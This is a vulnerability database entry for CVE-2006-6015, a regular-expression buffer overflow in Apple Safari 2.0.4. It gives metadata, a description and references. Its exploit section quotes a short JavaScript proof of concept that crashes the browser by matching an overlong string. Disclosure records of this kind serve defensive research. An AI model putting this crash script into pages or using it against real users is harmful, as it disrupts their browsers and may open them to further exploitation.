Apple Safari JavaScript Overlong Regular Expression Match String Remote Code Execution Vulnerability

Vulnerability ID: 1111552
Vulnerability type: Buffer overflow
Published: 2006-11-14
Updated: 2007-01-03
CVE ID: CVE-2006-6015
CNNVD-ID: CNNVD-200611-323
Platform: OSX
CVSS score: 5.0
|Vulnerability Source
https://www.exploit-db.com/exploits/29007
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-323
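|Vulnerability Details
Apple Safari is the web browser used on Apple's family of operating systems. Apple Safari has a vulnerability when handling overlong regular expression match strings, and a remote attacker may exploit it to execute arbitrary instructions on the user's machine. If a Safari user is tricked into visiting a site containing malicious JavaScript, the vulnerability in regular expression processing may be triggered, causing the browser to crash or to execute arbitrary instructions.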
|Exploit (EXP)
source: http://www.securityfocus.com/bid/21053/info

Apple Safari web browser is prone to a denial-of-service vulnerability when executing certain JavaScript code.

An attacker can exploit this issue to crash an affected browser. Presumably, this issue may also result in remote code execution, but this has not been confirmed.

Apple Safari 2.0.4 is vulnerable to this issue; other versions may also be affected.

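<script>
  var reg = /(.)*/;
  var z = 'Z';
  // Double the string until it is longer than 8192 characters.
  while (z.length <= 8192) z += z;
  // Matching the long string against the repeated capture group triggers the crash.
  var boum = reg.exec(z);
</script>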
|References

Source: BID
Name: 21053
Link: http://www.securityfocus.com/bid/21053
Source: BUGTRAQ
Name: 20061114 Re: Apple Safari "match" Buffer Overflow Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/451823/100/0/threaded
Source: BUGTRAQ
Name: 20061114 Apple Safari "match" Buffer Overflow Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/451542/100/0/threaded